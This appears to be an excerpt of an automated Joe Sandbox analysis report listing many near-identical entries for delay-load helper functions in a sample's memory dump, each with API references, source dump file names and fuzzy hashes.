                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: dddd6ee410aae7fb0d22aace8b4e1e0a24574bfee7ad6b56807ec241689fe1c3
                          • Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
                          • Opcode Fuzzy Hash: dddd6ee410aae7fb0d22aace8b4e1e0a24574bfee7ad6b56807ec241689fe1c3
                          • Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30
                          Function 0038D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 35dd4cb50f8cc55bd851b468a07b2ef628b2e689437c3df19c72146d7eeda0e3
                          • Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
                          • Opcode Fuzzy Hash: 35dd4cb50f8cc55bd851b468a07b2ef628b2e689437c3df19c72146d7eeda0e3
                          • Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30
                          Function 0038D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: d5b44ca79a40debb8e978efec453e5e2938214e6ccb92503664de064531b4a17
                          • Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
                          • Opcode Fuzzy Hash: d5b44ca79a40debb8e978efec453e5e2938214e6ccb92503664de064531b4a17
                          • Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30
                          Function 0038D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: a16bcbb6c559a1bbd1fa8d0a8b3038430d29da8836a0fb2750b3ddf9b3aa68cc
                          • Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
                          • Opcode Fuzzy Hash: a16bcbb6c559a1bbd1fa8d0a8b3038430d29da8836a0fb2750b3ddf9b3aa68cc
                          • Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30
                          Function 0038DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 8fd132d8b64ebba8ef96818c509662cfb0d5df6c942176586f7fe2c6255417f0
                          • Instruction ID: 2589791ec1b08c8d3a1ded221468ff4dc34a760506f4d577328d023624e23365
                          • Opcode Fuzzy Hash: 8fd132d8b64ebba8ef96818c509662cfb0d5df6c942176586f7fe2c6255417f0
                          • Instruction Fuzzy Hash: E0A011A22AC2023C300EB202AC02C3A032CC0C0B22330828AF00AA80CAA88808082A30
                          Function 0038DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: f2cea6e50036a971caa92e3df209d878ae9da08fd6dd656d2b3b50e87baa510c
                          • Instruction ID: 5cbc3c5573613c224f14cfcf75b69905425356f6f112e04451151004d9ae9b3a
                          • Opcode Fuzzy Hash: f2cea6e50036a971caa92e3df209d878ae9da08fd6dd656d2b3b50e87baa510c
                          • Instruction Fuzzy Hash: AEA011A22AC202BC300E3202AC02C3A032CC0C0BA03308A8AF00A880CAA88808082A30
                          Function 0038DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: e9e39bc3321f793951a89bf8ed7c0848237ff840d5ca74748a2e0ae00f4aa5d3
                          • Instruction ID: 5cbc3c5573613c224f14cfcf75b69905425356f6f112e04451151004d9ae9b3a
                          • Opcode Fuzzy Hash: e9e39bc3321f793951a89bf8ed7c0848237ff840d5ca74748a2e0ae00f4aa5d3
                          • Instruction Fuzzy Hash: AEA011A22AC202BC300E3202AC02C3A032CC0C0BA03308A8AF00A880CAA88808082A30
                          Function 0038DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 869de7cdf28a74b648b0aa3b7481eb54b5c17df0ec07ba123008daf04daab743
                          • Instruction ID: 5cbc3c5573613c224f14cfcf75b69905425356f6f112e04451151004d9ae9b3a
                          • Opcode Fuzzy Hash: 869de7cdf28a74b648b0aa3b7481eb54b5c17df0ec07ba123008daf04daab743
                          • Instruction Fuzzy Hash: AEA011A22AC202BC300E3202AC02C3A032CC0C0BA03308A8AF00A880CAA88808082A30
                          Function 0038DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 6b2053c97e5cb0f36660d0435a0beadb49464af90938d766baa37bd793816484
                          • Instruction ID: 5cbc3c5573613c224f14cfcf75b69905425356f6f112e04451151004d9ae9b3a
                          • Opcode Fuzzy Hash: 6b2053c97e5cb0f36660d0435a0beadb49464af90938d766baa37bd793816484
                          • Instruction Fuzzy Hash: AEA011A22AC202BC300E3202AC02C3A032CC0C0BA03308A8AF00A880CAA88808082A30
                          Function 0038DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 45d2befa4e596b41e40393995ba2152c75f65c64ce13522b6f9171c62e3eab39
                          • Instruction ID: 5cbc3c5573613c224f14cfcf75b69905425356f6f112e04451151004d9ae9b3a
                          • Opcode Fuzzy Hash: 45d2befa4e596b41e40393995ba2152c75f65c64ce13522b6f9171c62e3eab39
                          • Instruction Fuzzy Hash: AEA011A22AC202BC300E3202AC02C3A032CC0C0BA03308A8AF00A880CAA88808082A30
                          Function 0038DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 4e5dc9f06f92aae9278422bc550a69024c042e4669c9c134089fa61d301185ba
                          • Instruction ID: bc7875d0bde9affeaf68287894fc58dbc317caa784b6532cd483d3ecfe48a698
                          • Opcode Fuzzy Hash: 4e5dc9f06f92aae9278422bc550a69024c042e4669c9c134089fa61d301185ba
                          • Instruction Fuzzy Hash: 48A011AA2AC202BC300B32003C0BCBA032CC0C0B20330888AF20B880C2AA800C082230
                          Function 0038DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 0ccb3a225530ec08dd181180d631e8257962e6a55045766ca772f8823ccd8103
                          • Instruction ID: bc7875d0bde9affeaf68287894fc58dbc317caa784b6532cd483d3ecfe48a698
                          • Opcode Fuzzy Hash: 0ccb3a225530ec08dd181180d631e8257962e6a55045766ca772f8823ccd8103
                          • Instruction Fuzzy Hash: 48A011AA2AC202BC300B32003C0BCBA032CC0C0B20330888AF20B880C2AA800C082230
                          Function 0038DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 775e3a9b5c39671751ffe8ac6e287c3d387b7903749cdb2edf64dd3a8ba70724
                          • Instruction ID: bc7875d0bde9affeaf68287894fc58dbc317caa784b6532cd483d3ecfe48a698
                          • Opcode Fuzzy Hash: 775e3a9b5c39671751ffe8ac6e287c3d387b7903749cdb2edf64dd3a8ba70724
                          • Instruction Fuzzy Hash: 48A011AA2AC202BC300B32003C0BCBA032CC0C0B20330888AF20B880C2AA800C082230
                          Function 0038DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 081b1eaad056d286e6c7777dfeb979cd348d5dbdb90e492c99d6b6b9fa159238
                          • Instruction ID: bc7875d0bde9affeaf68287894fc58dbc317caa784b6532cd483d3ecfe48a698
                          • Opcode Fuzzy Hash: 081b1eaad056d286e6c7777dfeb979cd348d5dbdb90e492c99d6b6b9fa159238
                          • Instruction Fuzzy Hash: 48A011AA2AC202BC300B32003C0BCBA032CC0C0B20330888AF20B880C2AA800C082230
                          Function 0038DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DC36
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: a216d03a72b8492cdc7905a468eaf88bba3b2e7737362ad3b58553d9adbe7a1f
                          • Instruction ID: 25fc54fe31fcf3dcf45bc2775657cdbdfe517e8b0061cf8b0f759830426fc167
                          • Opcode Fuzzy Hash: a216d03a72b8492cdc7905a468eaf88bba3b2e7737362ad3b58553d9adbe7a1f
                          • Instruction Fuzzy Hash: 9CA0029556D3027C710E75517D16D76437CC4C5B513304959F50A944D165845C455531
                          Function 0038DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DC36
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: a00e5133e0b827736f50e9e913caabb9c5b44b247f86172d97f27391ef8abca7
